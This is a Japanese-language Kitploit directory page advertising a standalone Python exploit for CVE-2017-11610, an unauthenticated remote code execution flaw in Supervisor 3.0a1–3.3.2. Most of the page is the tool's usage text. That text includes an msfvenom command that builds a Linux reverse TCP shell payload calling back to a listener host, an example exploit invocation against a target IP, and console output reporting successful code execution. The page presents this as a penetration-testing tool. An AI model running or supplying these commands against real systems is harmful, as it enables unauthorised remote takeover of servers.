Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-11610 — Supervisor 3.0a1から3.3.2向けの認証不要RCEエクスプロイト(Python ≥3.6スタンドアロン版) | Kitploit
ツール/GitHubGitHub/ivanitlearning/cve-2017-11610
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubivanitlearning/cve-2017-11610

CVE-2017-11610

Supervisor 3.0a1から3.3.2向けの認証不要RCEエクスプロイト(Python ≥3.6スタンドアロン版)

リポジトリを見る
26年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-11610 Supervisor 3.0a1~3.3.2 向け 未認証リバースシェルRCE

Python 3.6以上用のスタンドアロン未認証RCEエクスプロイト。対象はSupervisor 3.0a1~3.3.2。この Metasploitモジュール から書き直したものです。解説 記事はこちら。

Python 3.7で、Supervisor 3.3.2が動作する このターゲット でテスト済み。

使い方:

root@kitploit:~
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
                  [-rpcpath RPCPATH]

先にペイロードを生成してください。例:
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf

必須引数:
  -rhost RHOST      Supervisorが動作しているターゲットホスト。例: 192.168.92.153
  -payload PAYLOAD  ELFペイロードへのパス。例: dir/payload.elf

オプション引数:
  -rport RPORT      Supervisorが動作しているターゲットポート。デフォルト: 9001
  -rpcpath RPCPATH  Supervisor上のXML-RPCエンドポイントへのパス。デフォルト: '/RPC2' (例: http://192.168.92.153:9001/RPC2)

エクスプロイトの呼び出し例:
 ./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution
ツールをダウンロード